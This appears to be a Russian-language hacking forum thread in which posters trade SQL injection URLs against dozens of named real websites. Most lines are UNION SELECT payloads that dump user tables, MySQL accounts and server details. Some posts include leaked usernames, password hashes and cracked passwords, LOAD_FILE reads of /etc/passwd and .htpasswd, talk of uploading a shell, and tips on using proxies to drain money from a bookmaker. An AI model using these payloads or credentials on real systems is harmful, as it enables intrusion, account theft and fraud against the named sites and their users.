http://www.joseepedroalmeida.com/pombosdetalhe.php?identif=-1+union+select+1,user(),version(),database(),5,6/*

onboard.ru
http://www.onboard.ru/talkabout/show.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22+from+information_sc hema.tables/*

upd:

http://fat-cat.co.uk/fatcat/artistInfo.php?id=-1+union+select+1,concat_ws(0x3a,username,password, email),3,4,5,6+from+users+limit+0,1/*
~500 юзеров, логин:пасс:мэйл в чистом виде, пароли от форума. есть еще доступ к таблице mysql.user, столбцы не подбирал..

etc/passwd
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-1+union+select+1,LOAD_FILE(0x2F6574632F70617373776 4),3,4,5,6

upd2:
название базы улыбнуло :)
http://www.superherohype.com/news/topnews.php?id=-1+union+select+database()/*

http://jesusatlantic.com/main/modules/articles/article.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20/*

reererer

http://www.isaacmizrahiny.com/slideshow.php?id=-86%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1 3,concat(username,0x3a,password),15,16,17,18,19,20 ,21,22+from+users/*

http://www.vesnaupi.ru/cross/gallery.php?dep=4&gal=4&pos=&id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

www.bukmekers.com
Букмекерская контора

http://bukmekers.com/index.php?option=com_user&task=doStakeMenu&cid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())+from+INFORMATION_SCHEMA.TABLE S/*

1) Скуля действует только от зарегестрированного пользователя;
2) Регестрируйте юзера только под проксями));
3) Имена таблиц ищите только под проксями;
4) Ваш акк могут через какое-то время забанить, ну потом зареганите другой));
5) Далее, как деньги слить думаю разберетесь.

Удачи.

mssql

http://www.stud-info.com/shop/ozon/book/zakaz.asp?id=-1+union+all+select+1,2,3,4,5,6,table_name,8,9,10,1 1+from+information_schema.tables--

mysql

http://www.vtv.gcg.ru/konkurs/?konkurs=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),c har(58),user(),char(58),version())/*

http://www.onlineflashgamez.com/index.php?action=playgame&gameid=-1+union+select+1,concat_ws(0x3a,username,password, emailaddress),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22+from+users+limit+0,1/*
admin:dbc50ecb629ac64cc2fdad7bede9daf2: onlineflashgamez@gmail.com

dbc50ecb629ac64cc2fdad7bede9daf2 = 1qa2ws
http://www.onlineflashgamez.com/admin/index.php
:)

http://state.rin.ru/cgi-bin/news.pl?id=-118107+union+select+1,2,concat_ws(char(58),name,lo gin),4+from+users/*

вот тут с табличкой пришлось напрячься=\
http://shop.vashtextil.com.ua/main.php?id=-7'+union+select+1,id,3,4+from+tbl_main/*

telemir.com.ua

http://telemir.com.ua/news/news.html?id=-1+union+select+1,2,concat(user_name,char(58),user_ password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+f rom+users/*

Admin:Admin мда...


http://telemir.com.ua/admin - убогейшая, вообще ничего нету =(

dorian.ru
http://www.dorian.ru/catalog/dog.php?screen=1&id=-1+union+select+concat(name,0x3a,password),2,3,4,5, 6+from+users+limit+0,1/*

admin:e10adc3949ba59abbe56e057f20f883e
upd: pass=123456

gostudy.com.ua

нимагу больше =((

Error in query The used SELECT statements have a different number of columns
http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98, 99,100,101,102/*

gostudy.com.ua

нимагу больше =((

Error in query The used SELECT statements have a different number of columns
http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98, 99,100,101,102/*
вот, немножко в другом месте ;)
вывод в title http://gostudy.com.ua/forum.phtml?theme_id=-61+union+select+database()+from+users/*

Так и не подобрал таблицу с пользователями(

http://books.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conve rt(database(),char),15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/*

phpfreaks.com
http://www.phpfreaks.com/user.php?cmd=view&user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,concat(username,0x3 a,password),27,28,29,30,31,32,33,34,35,36,37,38,39 +from+user+limit+0,1/*
36-37 тысяч юзеров..
phpfreak:d3d69778807f411f07768dd5ae7f194e:37

http://www.diariodemadryn.com/vernoti.php?ID=63708+union+select+1,2,3,version(), user(),database(),7,8,9,10+limit+1,1/*
www.mysql-hispano.org
http://www.mysql-hispano.org/page.php?id=43%20UNION%20SELECT%20version(),2+limi t+1,1/*
http://sololiteratura.com/php/autor.php?id=-3+union+select+1,database(),version()/*
http://www.agenciapulsar.org/coberturas_det.php?id=-14+union+select+1,2,3,version()/*

А вот и скуля у падлючих комуняк.

www.komunist.com.ua

http://www.komunist.com.ua/?news_id=9999+union+select+convert(version(),char) +from+users/*






p.s.эх спасибо Грею, так бы до бесконечности подбирал еслиб не тайтл =)

Вроде колонка pass только ничего не выводит...

http://bvp.ru/libs/list.php?tid=-1+union+select+1,concat(id,char(58),name),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors +limit+21,1/*

http://www.ont.by/index.php?id_sport=6&id=-1+union+select+1,2,3,database(),5,6,7,8,9,10,11/*

Чет мне с колонками не везет сегодня =(
http://www.job4u.com.ua

http://www.job4u.com.ua/jobList.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26............


http://www.proformula.ua

http://www.proformula.ua/archive.phtml?id_rubric=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31.. ........

kino.ru

http://kino.ru/cinema.php?id=-1+union+select+1,2,3,4,5,6,7/*

=(

http://www.goverla-tour.com.ua/country.php?countr_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51

www.gov-civil-aveiro.pt
http://www.gov-civil-aveiro.pt/printnoticia.php?id=-212%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10/*

http://www.labor.ru/consult.php?id=-1+union+select+1,2,3/*

http://www.sotovikm.ru/tovar.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
сайт без формы, просто так запостил)
http://ccfrussia.ru/index.php?mod=p_article&p_id=-1+union+select+1,2,3,4,5,convert(table_name+using+ latin1),7,8,9,10,11,12,13+from+information_schema. tables+limit+62,1/*
все не смотрел.. думаю, там тож ниче интересного..
мде.. не клюет че-то (c)

http://www.rusguns.org/article.php?id=-1+union+select+1,2,3,4,5,6,7/*

Автомагазин On-Line

http://www.autogazeta.com/car.php?id=-1+union+select+1,table_name+from+information_schem a.tables+limit+16,5/*

http://www.event4you.ru/bands_detail.php?id=-1+union+select+1,2,3,4,5,6/*

Вроде колонка pass только ничего не выводит...


http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6+from+mysql.user+limit+0,1/*
аналогичная ситуация..

Наконецто более\менее серьезная жертва =)
lecos.com.ua

Lecos
Интерент Сервис Провайдер.
http://lecos.com.ua/new/mod.php?mod=userpage&menu=1002&page_id=-1+union+select+convert(concat(user(),char(58),vers ion(),char(58),database()),char),2/*

linux

http://www.linux1394.org/view_device.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6+from+mysql.user+limit+0,1/*
аналогичная ситуация..

http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,LOAD_FILE('/usr/local/apache/htdocs/admin/.htpasswd'),3,4,5,6/*

^^
LOAD_FILE, etc...
=)

http://www.liljas-library.com/section.php?id=21+order+by+11/*
ЖЕЕЕСТЬ - см щапку... ужос.. (клабонервным не ссать, не такая уж и жесть) :mad:

http://www.rosma.edu.ee/files/index.php?id=-42+union+select+user(),version()/*

http://dvdselect.ru/podrobno.php?dvd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2/*
табл не подобрал :)

http://www.consodurable.org/dossiers_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://dvdselect.ru/podrobno.php?dvd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2/*
табл не подобрал :)

http://dvdselect.ru/podrobno.php?dvd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat(login,0x3a,pass),2 5,26,27,28,29,30,31,32+from+admins/*

а еще тут работает into outfile =)


http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,load_file('/tmp/p.php'),3,4,5,6+from+acana_content_razdel/*

мона думаю и шелл залить=)
заливайте, ёпти, если нужно.. ;)

http://www.sofiacityguide.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

хоть что-то.. :)
http://curious.astro.cornell.edu/question.php?number=-1+union+select+1,2,concat(user,0x3a,password),4,5, 6+from+mysql.user+limit+1,1/*
root:7d1eb49a69051fd4

+upd:
http://adbusters.org/metas/eco/bnd/view.php?id=-1+union+select+1,convert(version()+using+latin1),3 ,4/*

вава

http://www.sobewineandfoodfest.com/2007/events_info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*

Еще один скальп в мою коллекцию, только под вечер хороший улов пошел =)

http://www.bis-el.kiev.ua

http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-1+union+select+1,2,3,4,concat(login,char(58),passw d),6,7,8,9,10,11+from+users/*

9o909
http://www.feraud.com/contenu.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21/*

Идеальная скуль))) А поначалу выплевывал такую скромненькую ошибочку=)
http://www.smeda.org/main.php?id=-192+union+select+1,user,password,4,5,concat_ws(cha r(58),user(),version(),database()),7+from+mysql.us er/*

http://www.trinityfoundation.org/journal.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*

www.karavan-megastore.com.ua

http://www.karavan-megastore.com.ua/?view=read&n_id=-1+union+select+1,concat(version(),char(58),databas e(),char(58),user()),3,4/*

китаиси

http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

На больше несмог(
http://www.racing-fc.lu/shop/?id=-17+UNION+SELECT+1,2,3,4,5,concat(shop_stock_ID,0x3 a,spec,0x3a,quant,0x3a,name,0x3a,descr,0x3a,price) +FROM+shop+LEFT+JOIN+shop_stock+ON+ref_shop=shop_I D+WHERE+shop_ID=17/*

http://auroraforum.org/events.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
и
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
ы

http://www.oebu.ch/de/artikel.php?id=-324%20UNION%20SELECT%201,2,convert(version()+using +latin1)/*

http://mobile.ru


Похекали Мобайла =)

http://mobile.ru/news.php?news_id=-1+union+select+1,concat(username,char(58),version( ),database()),3,4,5,6,7,8+from+user/*

http://www.highpointlowlife.com/webrelease.php?id=21+order+by+8

http://www.rueleon.net/manifestations.php?Id=-51+union+select+version()/*

На прошлой странице лежал скуль:
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

http://www.nonom.cn/showmz.php?id=-1+union+select+1,concat(username,char(58),password ),3,4,5,6,7,8+from+user/*

BNE:96e79218965eb72c92a549dd5a330112

Китайцы это жесть:)

http://www.njwrecords.com/releases.php?id=21+order+by+18

http://dangerousmathematicians.com/type.php?id=-4+UNION+SELECT+1,2,3/*

and

http://www.4elementy.sk/shop/?id=-08+UNION+SELECT+1,2,3,4,5,6,DATABASE(),8,9,10/*

http://busexplorer.com/PHP/FeaturePage.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

.edu
http://hmtzrecords.hmt.edu/order.php?ID=-10%20UNION%20SELECT%201,2,3,version(),5,6/*
http://www.wahlen07.edu-zh.ch/detail.php?id=-100%20UNION%20SELECT%201,2,3,4,5,6,convert(user()+ using+latin1),8,9,10,11,12,13,14,15,16,17,18,19/*

http://www.feldgrau.com/PzDiv.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,/*

http://www.amibroker.com/library/detail.php?id=-117+UNION+SELECT+1,2,3,4,5,6/*

http://www.backporchrevolution.com/release.php?id=21+order+by+1/*

http://www.amnestyusa.org/america/attend.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from +mysql.user/*

http://www.faithfulamerica.org/article.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19/*

http://www.shamray.ru/faq.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13/*

cedu.ro
http://www.cedu.ro/burse.php?id=-117+UNION+SELECT+1,2,3,4/*

http://www.amerdental.com/category.php?major=9&minor=-1+union+select+1/*


http://www.handster.com/de/product.php?id=-1+union+select+1/*

1di - Первый диспетчер интернета
http://1di.ru/readarticle.php?article_id='+union+select+1,2,3,4, 5,6,7,8,9,10,11/*